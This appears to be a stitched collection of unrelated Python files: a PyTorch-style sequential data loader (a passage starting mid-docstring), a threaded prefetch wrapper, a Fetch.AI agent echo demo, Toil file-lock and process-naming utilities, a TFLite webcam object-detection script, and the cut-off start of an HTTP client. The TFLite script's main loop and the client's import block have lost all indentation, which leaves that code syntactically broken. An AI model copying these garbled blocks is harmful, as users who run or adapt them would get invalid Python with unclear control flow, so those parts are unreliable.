    Arguments:
        dataset (Dataset): dataset from which to load the data.
        batch_size (int, optional): samples per batch (default: 1).
        shuffle (bool, optional): reshuffle the data at every epoch
            (default: False).
        sampler (Sampler, optional): strategy for drawing samples; mutually
            exclusive with ``shuffle``.
        batch_sampler (Sampler, optional): like sampler but yields a batch
            of indices at a time; mutually exclusive with batch_size,
            shuffle, sampler, and drop_last.
        num_workers (int, optional): subprocess count for loading; 0 loads
            in the main process (default: 0).
        collate_fn (callable, optional): merges a list of samples into a
            mini-batch.
        pin_memory (bool, optional): copy tensors into CUDA pinned memory
            before returning them.
        drop_last (bool, optional): drop the final incomplete batch
            (default: False).
        timeout (numeric, optional): non-negative timeout for collecting a
            batch from workers (default: 0).
        worker_init_fn (callable, optional): called in each worker with the
            worker id after seeding and before loading (default: None).
    """
    __initialized = False

    def __init__(self, dataset, batch_size=1, shuffle=False, sampler=None, batch_sampler=None,
                 num_workers=0, collate_fn=default_collate, pin_memory=False, drop_last=False,
                 timeout=0, worker_init_fn=None):
        self.dataset = dataset
        self.batch_size = batch_size
        self.num_workers = num_workers
        self.collate_fn = collate_fn
        self.pin_memory = pin_memory
        self.drop_last = drop_last
        self.timeout = timeout
        self.worker_init_fn = worker_init_fn

        # Validate option combinations in the same order as before so
        # callers see identical errors.
        if timeout < 0:
            raise ValueError('timeout option should be non-negative')

        if batch_sampler is not None:
            if batch_size > 1 or shuffle or sampler is not None or drop_last:
                raise ValueError('batch_sampler option is mutually exclusive '
                                 'with batch_size, shuffle, sampler, and '
                                 'drop_last')
            # batch_sampler supersedes these two; None marks them unused.
            self.batch_size = None
            self.drop_last = None

        if sampler is not None and shuffle:
            raise ValueError('sampler option is mutually exclusive with '
                             'shuffle')

        if self.num_workers < 0:
            raise ValueError('num_workers option cannot be negative; '
                             'use num_workers=0 to disable multiprocessing.')

        if batch_sampler is None:
            if sampler is None:
                sampler = RandomSampler(dataset) if shuffle else SequentialSampler(dataset)
            batch_sampler = BatchSampler(sampler, batch_size, drop_last)

        self.sampler = sampler
        self.batch_sampler = batch_sampler
        self.__initialized = True

    def __setattr__(self, attr, val):
        # After construction, freeze the attributes the iterator depends on.
        if self.__initialized and attr in ('batch_size', 'sampler', 'drop_last'):
            raise ValueError('{} attribute should not be set after {} is '
                             'initialized'.format(attr, self.__class__.__name__))
        super(SequentialDataLoader, self).__setattr__(attr, val)

    def __iter__(self):
        return _SequentialDataLoaderIter(self)

    def __len__(self):
        return len(self.batch_sampler)
from queue import Queue,Empty
from threading import Thread
class AsyncDataLoader(object):
    """
    Wraps an iterable dataloader and prefetches its items on a background
    thread, buffering up to ``buffer_size`` items ahead of the consumer.

    :param dataloader: any iterable yielding batches.
    :param int buffer_size: maximum number of prefetched items to hold.
    """

    def __init__(self, dataloader, buffer_size=100):
        self.buffer_size = buffer_size
        self.dataloader = dataloader

    def __iter__(self):
        queue = Queue(self.buffer_size)
        source = iter(self.dataloader)
        # Holds an exception raised in the worker so it can be re-raised in
        # the consumer instead of silently hanging it.
        error = []

        def _worker():
            try:
                for item in source:
                    queue.put(item)
            except Exception as exc:
                # Remember the failure for the consumer.
                error.append(exc)
            finally:
                # Always emit the sentinel, even on failure; previously a
                # non-StopIteration error killed the worker without it and
                # the consumer blocked forever on queue.get().
                queue.put(None)

        # daemon=True so an abandoned, half-consumed iterator cannot keep
        # the whole process alive at exit.
        worker = Thread(target=_worker, daemon=True)
        worker.start()
        while True:
            item = queue.get()
            if item is None:
                break
            yield item
        worker.join()
        if error:
            raise error[0]

    def __len__(self):
        return len(self.dataloader)
|
agent_code_block.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This scripts contains code from agent-vs-aea.md file."""
import os
import time
from threading import Thread
from typing import List
from aea.agent import Agent
from aea.configurations.base import ConnectionConfig
from aea.connections.base import Connection
from aea.helpers.file_io import write_with_lock
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection
from packages.fetchai.protocols.default.message import DefaultMessage
INPUT_FILE = "input_file"
OUTPUT_FILE = "output_file"
class MyAgent(Agent):
    """A minimal agent that echoes default-protocol envelopes back to their sender."""

    def __init__(self, identity: Identity, connections: List[Connection]):
        """Initialise the agent."""
        super().__init__(identity, connections)

    def setup(self):
        """Setup the agent."""

    def act(self):
        """Act implementation."""
        print("Act called for tick {}".format(self.tick))

    def handle_envelope(self, envelope: Envelope) -> None:
        """
        Handle envelope.

        :param envelope: the envelope received
        :return: None
        """
        print("React called for tick {}".format(self.tick))
        if envelope is None:
            return
        if envelope.protocol_specification_id != DefaultMessage.protocol_specification_id:
            return
        # Swap the addressing so the reply goes back to the original sender.
        original_sender = envelope.sender
        original_receiver = envelope.to
        envelope.to = original_sender
        envelope.sender = original_receiver
        envelope.message = DefaultMessage.serializer.decode(envelope.message_bytes)
        envelope.message.sender = original_receiver
        envelope.message.to = original_sender
        print(
            "Received envelope from {} with protocol_specification_id={}".format(
                original_sender, envelope.protocol_specification_id
            )
        )
        self.outbox.put(envelope)

    def teardown(self):
        """Teardown the agent."""
def run():
    """Run the stub-connection echo demo end to end.

    Starts the agent on a background thread, feeds one default-protocol
    envelope in through the stub connection's input file, prints the echoed
    reply from the output file, then shuts the agent down.
    """
    # Ensure the input and output files do not exist initially.
    if os.path.isfile(INPUT_FILE):
        os.remove(INPUT_FILE)
    if os.path.isfile(OUTPUT_FILE):
        os.remove(OUTPUT_FILE)

    # Create an addresses identity:
    identity = Identity(
        name="my_agent", address="some_address", public_key="public_key"
    )

    # Set up the stub connection.
    configuration = ConnectionConfig(
        input_file_path=INPUT_FILE,
        output_file_path=OUTPUT_FILE,
        connection_id=StubConnection.connection_id,
    )
    stub_connection = StubConnection(
        configuration=configuration, data_dir=".", identity=identity
    )

    # Create our Agent.
    my_agent = MyAgent(identity, [stub_connection])

    # Create the runner thread BEFORE the try block: previously `t` was
    # bound inside it, so a failure in Thread(...) made the finally clause
    # raise NameError on t.join() and mask the real error.
    t = Thread(target=my_agent.start)
    try:
        t.start()
        # Wait for everything to start up.
        time.sleep(3)
        # Create a message inside an envelope and get the stub connection
        # to pass it into the agent.
        message_text = b"my_agent,other_agent,fetchai/default:1.0.0,\x12\r\x08\x01*\t*\x07\n\x05hello,"
        with open(INPUT_FILE, "wb") as f:
            write_with_lock(f, message_text)
        # Wait for the envelope to get processed.
        time.sleep(2)
        # Read the output envelope generated by the agent.
        with open(OUTPUT_FILE, "rb") as f:
            print("output message: " + f.readline().decode("utf-8"))
    finally:
        # Shut down the agent and wait for its thread to finish.
        my_agent.stop()
        if t.ident is not None:  # only join a thread that actually started
            t.join()
# Script entry point.
if __name__ == "__main__":
    run()
|
threading.py | # Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
from __future__ import absolute_import
from future.utils import raise_
from builtins import range
import atexit
import fcntl
import logging
import math
import os
import sys
import tempfile
import threading
import traceback
from contextlib import contextmanager
from threading import BoundedSemaphore
import psutil
from toil.lib.misc import robust_rmtree
log = logging.getLogger(__name__)
class BoundedEmptySemaphore(BoundedSemaphore):
    """
    A bounded semaphore that is initially empty: every release() must be
    matched by a later acquire(), up to the configured value.

    :param int value: capacity of the semaphore.
    :param verbose: legacy Python 2 debug flag. Python 3's
        threading.BoundedSemaphore takes no such argument, so it is only
        forwarded when explicitly given.
    """

    def __init__(self, value=1, verbose=None):
        if verbose is None:
            # Fix: the old code passed `verbose` unconditionally, which
            # raises TypeError on Python 3 where BoundedSemaphore.__init__
            # accepts only `value`.
            super(BoundedEmptySemaphore, self).__init__(value)
        else:
            super(BoundedEmptySemaphore, self).__init__(value, verbose)
        # Drain all permits so the semaphore starts out empty.
        for _ in range(value):
            assert self.acquire(blocking=False)
class ExceptionalThread(threading.Thread):
    """
    A thread whose join() re-raises exceptions raised during run().

    join() is idempotent, but the exception is re-raised only by the first
    join() call that successfully joined the thread; a timed-out join()
    re-raises nothing even if run() has already failed.

    Subclasses should override tryRun() instead of run().

    >>> def f():
    ...     assert 0
    >>> t = ExceptionalThread(target=f)
    >>> t.start()
    >>> t.join()
    Traceback (most recent call last):
    ...
    AssertionError

    >>> class MyThread(ExceptionalThread):
    ...     def tryRun( self ):
    ...         assert 0
    >>> t = MyThread()
    >>> t.start()
    >>> t.join()
    Traceback (most recent call last):
    ...
    AssertionError
    """
    exc_info = None

    def run(self):
        try:
            self.tryRun()
        except:
            # Remember the failure for join(), then let the thread die.
            self.exc_info = sys.exc_info()
            raise

    def tryRun(self):
        super(ExceptionalThread, self).run()

    def join(self, *args, **kwargs):
        super(ExceptionalThread, self).join(*args, **kwargs)
        if not self.is_alive() and self.exc_info is not None:
            exc_type, exc_value, exc_tb = self.exc_info
            # Clear first so a second join() does not re-raise again.
            self.exc_info = None
            raise_(exc_type, exc_value, exc_tb)
# noinspection PyPep8Naming
class defaultlocal(threading.local):
    """
    Thread-local storage in which every thread sees the given default values.

    >>> l = defaultlocal( foo=42 )
    >>> def f(): print(l.foo)
    >>> t = threading.Thread(target=f)
    >>> t.start() ; t.join()
    42
    """

    def __init__(self, **defaults):
        super(defaultlocal, self).__init__()
        # threading.local re-runs __init__ with these same kwargs in each
        # new thread, which is what makes the defaults appear everywhere.
        self.__dict__.update(defaults)
def cpu_count():
    """
    Get the rounded-up integer number of whole CPUs available.

    Counts hyperthreads as CPUs. Uses the system's actual CPU count, or the
    current v1 cgroup's quota per period, if the quota is set.

    Ignores the cgroup's cpu shares value, because it's extremely difficult
    to interpret. See https://github.com/kubernetes/kubernetes/issues/81021.

    Caches the result for efficiency — in every path: the old code returned
    early on an unlimited quota (-1) without setting the cache, so the whole
    computation re-ran on every call in that case.

    :return: Integer count of available CPUs, minimum 1.
    :rtype: int
    """
    cached = getattr(cpu_count, 'result', None)
    if cached is not None:
        # We already got a CPU count.
        return cached

    # Fallback answer: all the CPUs on the machine.
    total_machine_size = psutil.cpu_count(logical=True)
    log.debug('Total machine size: %d cores', total_machine_size)

    # Infinity means "no cgroup limit"; min() below then keeps the machine size.
    cgroup_size = float('inf')
    try:
        with open('/sys/fs/cgroup/cpu/cpu.cfs_quota_us', 'r') as stream:
            # Read the quota
            quota = int(stream.read())
        log.debug('CPU quota: %d', quota)
        if quota != -1:
            with open('/sys/fs/cgroup/cpu/cpu.cfs_period_us', 'r') as stream:
                # Read the period in which we are allowed to burn the quota
                period = int(stream.read())
            log.debug('CPU quota period: %d', period)
            # The thread count is how many multiples of a wall clock period
            # we can burn in that period.
            cgroup_size = int(math.ceil(float(quota) / float(period)))
            log.debug('Cgroup size in cores: %d', cgroup_size)
    except Exception:
        # We can't actually read these cgroup fields. Maybe we are a mac or
        # a cgroup-v2-only host; fall back to the machine size.
        log.debug('Could not inspect cgroup: %s', traceback.format_exc())

    # The smaller of the actual thread count and the cgroup's limit, minimum 1.
    result = max(1, min(cgroup_size, total_machine_size))
    log.debug('cpu_count: %s', str(result))
    # Make sure to remember it for the next call.
    cpu_count.result = result
    return result
# PIDs are a bad identifier, because they are not shared between containers
# and also may be reused.
# So instead we have another system for file store implementations to
# coordinate among themselves, based on file locks.
# TODO: deduplicate with DeferredFunctionManager?
# TODO: Wrap in a class as static methods?
# Note that we don't offer a way to enumerate these names. You can only get
# your name and poll others' names (or your own). So we don't have
# distinguishing prefixes or WIP suffixes to allow for enumeration.
# We keep one name per unique Toil workDir (i.e. /tmp or whatever existing
# directory Toil tries to put its workflow directory under.)
# We have a global lock to control looking things up
# Global lock controlling all process-name lookups.
current_process_name_lock = threading.Lock()
# Maps each work directory to this process's name within it. (A file
# descriptor per work directory is also held open — deliberately leaked.)
current_process_name_for = {}

def collect_process_name_garbage():
    """
    Drop process names whose backing files no longer exist (typically
    because a temporary work directory got cleaned up, as happens in the
    tests, which get their own temp directories).

    Caller must hold current_process_name_lock.
    """
    global current_process_name_for
    # Gather the doomed keys first; deleting while iterating is not allowed.
    stale = [workDir for workDir, name in current_process_name_for.items()
             if not os.path.exists(os.path.join(workDir, name))]
    for workDir in stale:
        del current_process_name_for[workDir]
def destroy_all_process_names():
    """
    Delete all our process name files because our process is going away.

    We let all our FDs get closed by the process death.

    We assume there is nobody else using the system during exit to race with.
    """
    global current_process_name_for
    # Remove each name file we created under its work directory.
    # NOTE(review): assumes robust_rmtree tolerates already-missing paths — confirm.
    for workDir, name in current_process_name_for.items():
        robust_rmtree(os.path.join(workDir, name))

# Run the cleanup at exit
atexit.register(destroy_all_process_names)
def get_process_name(workDir):
    """
    Return the name of the current process. Like a PID but visible between
    containers on what appears to Toil to be a single node.

    :param str workDir: The Toil work directory. Defines the shared namespace.
    :return: Process's assigned name
    :rtype: str
    """
    global current_process_name_lock
    global current_process_name_for
    with current_process_name_lock:
        # Make sure all the names still exist.
        # TODO: a bit O(n^2) in the number of workDirs in flight at any one time.
        collect_process_name_garbage()
        if workDir in current_process_name_for:
            # If we already gave ourselves a name, return that.
            return current_process_name_for[workDir]
        # We need to get a name file.
        nameFD, nameFileName = tempfile.mkstemp(dir=workDir)
        # Lock the file. The lock will automatically go away if our process does.
        try:
            fcntl.lockf(nameFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except IOError as e:
            # Someone else might have locked it even though they should not have.
            raise RuntimeError("Could not lock process name file %s: %s" % (nameFileName, str(e)))
        # Save the basename
        current_process_name_for[workDir] = os.path.basename(nameFileName)
        # Return the basename
        return current_process_name_for[workDir]
        # TODO: we leave the file open forever. We might need that in order for
        # it to stay locked while we are alive.
def process_name_exists(workDir, name):
    """
    Return true if the process named by the given name (from process_name) exists, and false otherwise.

    Can see across container boundaries using the given node workflow directory.

    :param str workDir: The Toil work directory. Defines the shared namespace.
    :param str name: Process's name to poll
    :return: True if the named process is still alive, and False otherwise.
    :rtype: bool
    """
    global current_process_name_lock
    global current_process_name_for
    with current_process_name_lock:
        if current_process_name_for.get(workDir, None) == name:
            # We are asking about ourselves. We are alive.
            return True
    # Work out what the corresponding file name is
    nameFileName = os.path.join(workDir, name)
    if not os.path.exists(nameFileName):
        # If the file is gone, the process can't exist.
        return False
    nameFD = None
    try:
        # Otherwise see if we can lock it shared, for which we need an FD, but
        # only for reading. A live owner holds an exclusive lock, so a shared
        # lock succeeding means the owner is dead.
        nameFD = os.open(nameFileName, os.O_RDONLY)
        try:
            fcntl.lockf(nameFD, fcntl.LOCK_SH | fcntl.LOCK_NB)
        except IOError as e:
            # Could not lock. Process is alive.
            return True
        else:
            # Could lock. Process is dead.
            # Remove the file. We race to be the first to do so.
            try:
                os.remove(nameFileName)
            except:
                pass
            # Unlock
            fcntl.lockf(nameFD, fcntl.LOCK_UN)
            # Report process death
            return False
    finally:
        if nameFD is not None:
            try:
                # Best effort; the FD may already be invalid during shutdown.
                os.close(nameFD)
            except:
                pass
# Similar to the process naming system above, we define a global mutex system
# for critical sections, based just around file locks.
@contextmanager
def global_mutex(workDir, mutex):
    """
    Context manager that locks a mutex. The mutex is identified by the given
    name, and scoped to the given directory. Works across all containers that
    have access to the given directory. Mutexes held by dead processes are
    automatically released.

    Only works between processes, NOT between threads.

    :param str workDir: The Toil work directory. Defines the shared namespace.
    :param str mutex: Mutex to lock. Must be a permissible path component.
    """
    # Define a filename
    lock_filename = os.path.join(workDir, 'toil-mutex-' + mutex)
    log.debug('PID %d acquiring mutex %s', os.getpid(), lock_filename)
    # We can't just create/open and lock a file, because when we clean up
    # there's a race where someone can open the file before we unlink it and
    # get a lock on the deleted file.
    while True:
        # Try to create the file, ignoring if it exists or not.
        fd = os.open(lock_filename, os.O_CREAT | os.O_WRONLY)
        # Wait until we can exclusively lock it.
        fcntl.lockf(fd, fcntl.LOCK_EX)
        # Holding the lock, make sure we are looking at the same file on disk still.
        fd_stats = os.fstat(fd)
        try:
            path_stats = os.stat(lock_filename)
        except FileNotFoundError:
            path_stats = None
        if path_stats is None or fd_stats.st_dev != path_stats.st_dev or fd_stats.st_ino != path_stats.st_ino:
            # The file we have a lock on is not the file linked to the name (if
            # any). This usually happens, because before someone releases a
            # lock, they delete the file. Go back and contend again. TODO: This
            # allows a lot of queue jumping on our mutex.
            fcntl.lockf(fd, fcntl.LOCK_UN)
            os.close(fd)
            continue
        else:
            # We have a lock on the file that the name points to. Since we
            # hold the lock, nobody will be deleting it or can be in the
            # process of deleting it. Stop contending; we have the mutex.
            break
    try:
        # When we have it, do the thing we are protecting.
        log.debug('PID %d now holds mutex %s', os.getpid(), lock_filename)
        yield
    finally:
        # Delete it while we still own it, so we can't delete it from out from
        # under someone else who thinks they are holding it.
        log.debug('PID %d releasing mutex %s', os.getpid(), lock_filename)
        os.unlink(lock_filename)
        fcntl.lockf(fd, fcntl.LOCK_UN)
        # Note that we are unlinking it and then unlocking it; a lot of people
        # might have opened it before we unlinked it and will wake up when they
        # get the worthless lock on the now-unlinked file. We have to do some
        # stat gymnastics above to work around this.
        os.close(fd)
class LastProcessStandingArena:
    """
    Class that lets a bunch of processes detect and elect a last process
    standing.

    Processes enter and leave (sometimes due to sudden existence failure). We
    guarantee that the last process to leave, if it leaves properly, will get a
    chance to do some cleanup. If new processes try to enter during the
    cleanup, they will be delayed until after the cleanup has happened and the
    previous "last" process has finished leaving.

    The user is responsible for making sure you always leave if you enter!
    Consider using a try/finally; this class is not a context manager.
    """

    def __init__(self, workDir, name):
        """
        Connect to the arena specified by the given workDir and name.

        Any process that can access workDir, in any container, can connect to
        the arena. Many arenas can be active with different names.

        Doesn't enter or leave the arena.

        :param str workDir: The Toil work directory. Defines the shared namespace.
        :param str name: Name of the arena. Must be a permissible path component.
        """
        # Save the workDir which namespaces everything
        self.workDir = workDir
        # We need a mutex name to allow only one process to be entering or
        # leaving at a time.
        self.mutex = name + '-arena-lock'
        # We need a way to track who is actually in, and who was in but died.
        # So everybody gets a locked file (again).
        # TODO: deduplicate with the similar logic for process names, and also
        # deferred functions.
        self.lockfileDir = os.path.join(workDir, name + '-arena-members')
        # When we enter the arena, we fill this in with the FD of the locked
        # file that represents our presence.
        self.lockfileFD = None
        # And we fill this in with the file name
        self.lockfileName = None

    def enter(self):
        """
        This process is entering the arena. If cleanup is in progress, blocks
        until it is finished.

        You may not enter the arena again before leaving it.
        """
        log.debug('Joining arena %s', self.lockfileDir)
        # Make sure we're not in it already.
        assert self.lockfileName is None
        assert self.lockfileFD is None
        with global_mutex(self.workDir, self.mutex):
            # Now nobody else should also be trying to join or leave.
            try:
                # Make sure the lockfile directory exists.
                os.mkdir(self.lockfileDir)
            except FileExistsError:
                pass
            # Make ourselves a file in it and lock it to prove we are alive.
            self.lockfileFD, self.lockfileName = tempfile.mkstemp(dir=self.lockfileDir)
            # Nobody can see it yet, so lock it right away
            fcntl.lockf(self.lockfileFD, fcntl.LOCK_EX)
            # Now we're properly in, so release the global mutex
        log.debug('Now in arena %s', self.lockfileDir)

    def leave(self):
        """
        This process is leaving the arena. If this process happens to be the
        last process standing, yields something, with other processes blocked
        from joining the arena until the loop body completes and the process
        has finished leaving. Otherwise, does not yield anything.

        Should be used in a loop:

            for _ in arena.leave():
                # If we get here, we were the last process. Do the cleanup
                pass
        """
        # Make sure we're in it to start.
        assert self.lockfileName is not None
        assert self.lockfileFD is not None
        log.debug('Leaving arena %s', self.lockfileDir)
        with global_mutex(self.workDir, self.mutex):
            # Now nobody else should also be trying to join or leave.
            # Take ourselves out.
            try:
                os.unlink(self.lockfileName)
            except:
                pass
            self.lockfileName = None
            fcntl.lockf(self.lockfileFD, fcntl.LOCK_UN)
            os.close(self.lockfileFD)
            self.lockfileFD = None
            for item in os.listdir(self.lockfileDir):
                # There is someone claiming to be here. Are they alive?
                full_path = os.path.join(self.lockfileDir, item)
                fd = os.open(full_path, os.O_RDONLY)
                try:
                    fcntl.lockf(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
                except IOError as e:
                    # Could not lock. It's alive!
                    break
                else:
                    # Could lock. Process is dead.
                    try:
                        os.remove(full_path)
                    except:
                        pass
                    fcntl.lockf(fd, fcntl.LOCK_UN)
                    # NOTE(review): fd is not closed here — looks like a
                    # descriptor leak per dead member; confirm.
                    # Continue with the loop normally.
            else:
                # Nothing alive was found. Nobody will come in while we hold
                # the global mutex, so we are the Last Process Standing.
                log.debug('We are the Last Process Standing in arena %s', self.lockfileDir)
                yield True
                try:
                    # Delete the arena directory so as to leave nothing behind.
                    os.rmdir(self.lockfileDir)
                except:
                    log.warning('Could not clean up arena %s completely: %s',
                                self.lockfileDir, traceback.format_exc())
                    pass
        # Now we're done, whether we were the last one or not, and can
        # release the mutex.
        log.debug('Now out of arena %s', self.lockfileDir)
|
TFLite_detection_webcam.py | ######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse # Command line interface
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util # Path access
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
    """Threaded wrapper around cv2.VideoCapture for low-latency frame reads."""

    def __init__(self, resolution=(640, 480), framerate=30):
        # NOTE(review): framerate is accepted but never applied to the
        # camera — confirm whether it should be.
        # Open camera index 1 and request MJPG plus the desired resolution.
        self.stream = cv2.VideoCapture(1)
        self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
        self.stream.set(3, resolution[0])  # CAP_PROP_FRAME_WIDTH
        self.stream.set(4, resolution[1])  # CAP_PROP_FRAME_HEIGHT

        # Prime the stream with one frame so read() always has data.
        (self.grabbed, self.frame) = self.stream.read()

        # Flag checked by the reader thread to know when to shut down.
        self.stopped = False

    def start(self):
        """Spawn the background reader thread; return self for chaining."""
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Continuously pull frames until stop() is called."""
        while not self.stopped:
            (self.grabbed, self.frame) = self.stream.read()
        # Close camera resources once stopped.
        self.stream.release()

    def read(self):
        """Return the most recent frame."""
        return self.frame

    def stop(self):
        """Signal the reader thread to exit (it releases the camera)."""
        self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
                    required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
                    default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
                    default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
                    default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
                    default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
                    action='store_true')

args = parser.parse_args()

MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu

# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
    from tflite_runtime.interpreter import Interpreter
    if use_TPU:
        from tflite_runtime.interpreter import load_delegate
else:
    from tensorflow.lite.python.interpreter import Interpreter
    if use_TPU:
        from tensorflow.lite.python.interpreter import load_delegate

# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
    # If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
    if (GRAPH_NAME == 'detect.tflite'):
        GRAPH_NAME = 'edgetpu.tflite'

# Get path to current working directory
CWD_PATH = os.getcwd()

# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)

# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)

# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
    labels = [line.strip() for line in f.readlines()]

# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
    del(labels[0])

# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
    interpreter = Interpreter(model_path=PATH_TO_CKPT,
                              experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
    print(PATH_TO_CKPT)
else:
    interpreter = Interpreter(model_path=PATH_TO_CKPT)

interpreter.allocate_tensors()

# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]  # model input height in pixels
width = input_details[0]['shape'][2]   # model input width in pixels

floating_model = (input_details[0]['dtype'] == np.float32)

# Normalization constants applied only to floating-point (non-quantized) models.
input_mean = 127.5
input_std = 127.5

# Check output layer name to determine if this model was created with TF2 or TF1,
# because outputs are ordered differently for TF2 and TF1 models
outname = output_details[0]['name']

if ('StatefulPartitionedCall' in outname): # This is a TF2 model
    boxes_idx, classes_idx, scores_idx = 1, 3, 0
else: # This is a TF1 model
    boxes_idx, classes_idx, scores_idx = 0, 1, 2

# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()

# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[boxes_idx]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[classes_idx]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[scores_idx]['index'])[0] # Confidence of detected objects
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
|
client.py | import base64
import hashlib
import hmac
import logging
import socket
import sys
import json
try:
import ssl
except ImportError:
ssl = None
from multiprocessing import pool
from queue import Queue
from threading import RLock, Thread
from datetime import datetime
import time
try:
# python3.6
from http import HTTPStatus
from urllib.request import Request, urlopen
from urllib.parse import urlencode, unquote_plus
from urllib.error import HTTPError, URLError
except ImportError:
# python2.7
import httplib as HTTPStatus
